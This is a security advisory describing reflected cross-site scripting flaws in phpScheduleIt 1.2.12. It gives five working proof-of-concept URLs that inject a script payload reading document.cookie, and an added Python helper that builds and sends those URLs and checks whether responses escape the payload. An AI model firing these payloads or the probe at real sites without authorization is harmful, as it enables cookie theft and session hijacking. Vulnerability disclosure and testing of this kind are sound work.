HTB22987: Multiple XSS in phpScheduleIt



Vulnerability ID: HTB22987
Reference: http://www.htbridge.ch/advisory/multiple_xss_in_phpscheduleit.html
Product: phpScheduleIt
Vendor: php.brickhost.com
Vulnerable Version: 1.2.12
Vendor Notification: 05 May 2011
Vulnerability Type: XSS (Cross Site Scripting)
Risk level: Medium
Credit: High-Tech Bridge SA Security Research Lab ( http://www.htbridge.ch/advisory/ )

Vulnerability Details:
An attacker can execute arbitrary JavaScript code in the context of the vulnerable application in a victim's browser (reflected XSS).
The vulnerability exists due to failure in the "forgot_pwd.php" script to properly sanitize user-supplied input passed in the request path (PATH_INFO) before it is reflected into the page.
Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, and disclosure or modification of sensitive data.
The following PoC is available:

http://[host]/forgot_pwd.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

The vulnerability exists due to failure in the "index.php" script to properly sanitize user-supplied input passed in the request path (PATH_INFO).
The following PoC is available:

http://[host]/index.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

The vulnerability exists due to failure in the "register.php" script to properly sanitize user-supplied input passed in the request path (PATH_INFO).
The following PoC is available:

http://[host]/register.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

The vulnerability exists due to failure in the "roschedule.php" script to properly sanitize user-supplied input passed in the request path (PATH_INFO).
The following PoC is available:

http://[host]/roschedule.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

The vulnerability exists due to failure in the "popCalendar.php" script to properly sanitize user-supplied input in the "scheduleid" GET parameter.
The following PoC is available:

http://[host]/popCalendar.php?scheduleid=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
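The five PoCs above share one payload and differ only in where it is injected (the request path for four scripts, the "scheduleid" parameter for the fifth). The following helper, an added example that is not part of the original advisory and not phpScheduleIt code, rebuilds the advisory's URLs from that payload and classifies how a response reflects it, so a tester can tell an unescaped reflection (script executes) from an HTML-entity-encoded one (output encoding in place). The sample response bodies, the host placeholder and the function names are constructed for illustration; the advisory does not include the vulnerable source, so the form-action context in the samples is an assumption.

```python
"""Verification helper for the HTB22987 PoCs (added example, not advisory or vendor code)."""
import html
import urllib.error
import urllib.parse
import urllib.request

# The advisory's payload, URL-decoded: closes an attribute/tag and injects a script element.
PAYLOAD = '"><script>alert(document.cookie);</script>'

# Scripts the advisory reports as reflecting the request path (PATH_INFO) ...
PATH_INFO_SCRIPTS = ("forgot_pwd.php", "index.php", "register.php", "roschedule.php")
# ... and the one reflecting a GET parameter.
PARAM_SCRIPTS = {"popCalendar.php": "scheduleid"}


def build_poc_urls(host: str) -> dict:
    """Return {script: url} for every PoC, percent-encoded exactly as in the advisory."""
    # The advisory leaves '/' and ';' unencoded; everything else in the payload is %XX.
    enc = urllib.parse.quote(PAYLOAD, safe="/;")
    urls = {script: f"http://{host}/{script}/{enc}" for script in PATH_INFO_SCRIPTS}
    for script, param in PARAM_SCRIPTS.items():
        urls[script] = f"http://{host}/{script}?{param}={enc}"
    return urls


def classify_reflection(body: str, payload: str = PAYLOAD) -> str:
    """
    Classify how a response body reflects the payload:
      'unescaped' - payload present verbatim, the script will run (vulnerable)
      'escaped'   - only an HTML-entity-encoded copy is present (htmlspecialchars-style fix)
      'absent'    - payload not reflected at all
    """
    if payload in body:
        return "unescaped"
    # html.escape(quote=True) yields &quot; &lt; &gt;, the same entities PHP's
    # htmlspecialchars() emits for this payload (it contains no single quote).
    if html.escape(payload, quote=True) in body:
        return "escaped"
    return "absent"


def probe(host: str, timeout: float = 10.0) -> dict:
    """Request each PoC URL and classify the reflection. Only for hosts you are authorized to test."""
    results = {}
    for script, url in build_poc_urls(host).items():
        try:
            with urllib.request.urlopen(url, timeout=timeout) as resp:
                body = resp.read().decode("utf-8", errors="replace")
        except urllib.error.HTTPError as err:
            # Error pages can reflect the path too, so classify them as well.
            body = err.read().decode("utf-8", errors="replace")
        results[script] = classify_reflection(body)
    return results


# Constructed sample responses (not captured from a real install); the form action built
# from the request path is an assumed, typical context for this PoC pattern.
VULNERABLE_BODY = '<form action="/forgot_pwd.php/' + PAYLOAD + '" method="post">'
FIXED_BODY = '<form action="/forgot_pwd.php/' + html.escape(PAYLOAD, quote=True) + '" method="post">'

if __name__ == "__main__":
    for script, url in build_poc_urls("[host]").items():
        print(script, "->", url)
    print("sample vulnerable body:", classify_reflection(VULNERABLE_BODY))
    print("sample fixed body:     ", classify_reflection(FIXED_BODY))
```

Two caveats when running `probe()` against a real target: the four PATH_INFO PoCs only reach the script if the web server passes the trailing path segment through (for example Apache with AcceptPathInfo enabled), so an 'absent' result there may reflect server configuration rather than a fixed application; and 'escaped' only proves the exact entity form was emitted, so an application that encodes `<` and `>` but leaves `"` intact would still allow attribute breakout and should be checked by hand.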
